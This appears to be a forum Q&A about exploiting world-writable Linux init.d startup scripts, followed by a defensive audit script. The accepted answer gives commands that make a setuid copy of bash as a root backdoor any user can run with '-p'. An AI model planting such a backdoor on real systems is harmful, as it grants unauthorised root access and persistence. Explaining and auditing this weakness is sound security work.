
What are startup scripts in Linux and what are the steps to exploit startup scripts if they are world writable?

I would appreciate it if someone could explain this using the following two files on Ubuntu 16 as an example:

/etc/init.d/README
/etc/init.d/sudo
Anders
drdot
  • Instead of giving you the answer I will give you a few questions. What is the goal of an attacker on a system where he has restricted privileges? What does it mean for a script to run on startup (under what user and context does it run)? Combine these two answers and you know what an attacker might want to do and how he could do it. – Lucas Kauffman Feb 13 '17 at 03:09
  • @LucasKauffman, for other scripts I understand. Why are we running sudo and README during startup? – drdot Feb 13 '17 at 03:11
  • @LucasKauffman, I don't want to get a hand-waving answer on the least privilege principle. I want to know exactly how to exploit them. – drdot Feb 13 '17 at 03:12
  • If a script is a collection of statements to be run in sequence and you were able to write to this file, adding statements at the end, what statements could you add to gain a more privileged account? – Lucas Kauffman Feb 13 '17 at 03:21
  • @LucasKauffman, if as a regular user I can write to the startup scripts which are executed with root privilege, then I can write it in a way that it runs my own shell command and/or runs my malicious binary as root. Is this what you are indicating? – drdot Feb 13 '17 at 05:27
  • @LucasKauffman, but I don't see the setuid bit set for these binaries. So a user can overwrite it; only if root runs it will it execute malicious stuff. However, are sudo and README being executed during boot? – drdot Feb 13 '17 at 05:29
  • I suggest you read up on your Linux folders and what they do. What is init.d used for? – Lucas Kauffman Feb 13 '17 at 10:59

1 Answer


Arrange for the following to run as root:

cp $(which bash) $(which bash).muhaha
chmod u+s $(which bash).muhaha

Now, executing $(which bash).muhaha -p gives root to any user. You can even run a script as root with $(which bash).muhaha -p /path/to/script.

The -p option is necessary because otherwise bash detects that it is setuid and drops root privileges as a security measure.

DepressedDaniel
  • Could you elaborate on what $(which bash) is? – drdot Feb 14 '17 at 03:35
  • `$(...)` runs a command and substitutes the command's output into the script. So `$(which bash)` stands for the output of the command `which bash`, which prints the path of `bash`. – DepressedDaniel Feb 14 '17 at 04:15
  • @dannycrane Basically, it makes the code more portable than assuming that `bash` is located at `/bin/bash`. – DepressedDaniel Feb 14 '17 at 04:30
  • So $(which bash) is the startup script that is world writable? Why would copying it to $(which bash).muhaha and then giving it execute permission make the muhaha script execute as root? – drdot Feb 14 '17 at 05:26
  • @dannycrane `chmod u+s` sets the `suid` bit https://en.wikipedia.org/wiki/Setuid. – DepressedDaniel Feb 14 '17 at 06:33
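As an added defensive check, not code from the question or the answer above, the script below audits the two conditions this page turns on: startup-script locations that any user can write to (the weakness the question asks about), and setuid executables that have appeared outside the normal system directories (the setuid copy of bash that the answer describes is exactly what the second check reports). The directory lists inside `audit_startup` are assumptions for illustration; the two helper functions accept any paths, so they can be pointed at whatever boot-time script locations a given distribution uses.

```shell
#!/bin/sh
# Added audit helper; it is not code from the question or the answer above.
# Two checks a defender would run on a box like the one discussed:
#   1. startup-script locations that any user can write to, including
#      world-writable directories, because a writable directory lets a user
#      replace a script even when the script file itself is not writable;
#   2. setuid executables outside the usual system binary directories,
#      which is where a copied shell with the setuid bit would show up.
# The default path lists in audit_startup are assumptions for illustration.

# Print regular files and directories under the given paths that are
# world-writable (the o+w bit is set). Paths that do not exist are skipped.
find_world_writable() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" \( -type f -o -type d \) -perm -0002 2>/dev/null
    done
    return 0
}

# Print regular files under the given paths that carry the setuid bit.
find_setuid() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f -perm -4000 2>/dev/null
    done
    return 0
}

# Run both checks against common startup and drop locations (assumed list)
# and print a labelled report. Run as root so every directory is readable.
audit_startup() {
    echo "== world-writable startup script locations =="
    find_world_writable /etc/init.d /etc/rc*.d /etc/systemd/system /lib/systemd/system
    echo "== setuid executables outside the base system =="
    find_setuid /usr/local /opt /tmp /var/tmp /home
}

# Uncomment to run the audit when this file is executed directly:
# audit_startup
```

Anything the first check lists should be fixed with `chmod o-w` and then reviewed for content that was not put there by the package that owns it; anything the second check lists that the package manager does not account for deserves the same scrutiny. Both checks are cheap enough to run from cron and diff against a known-good baseline.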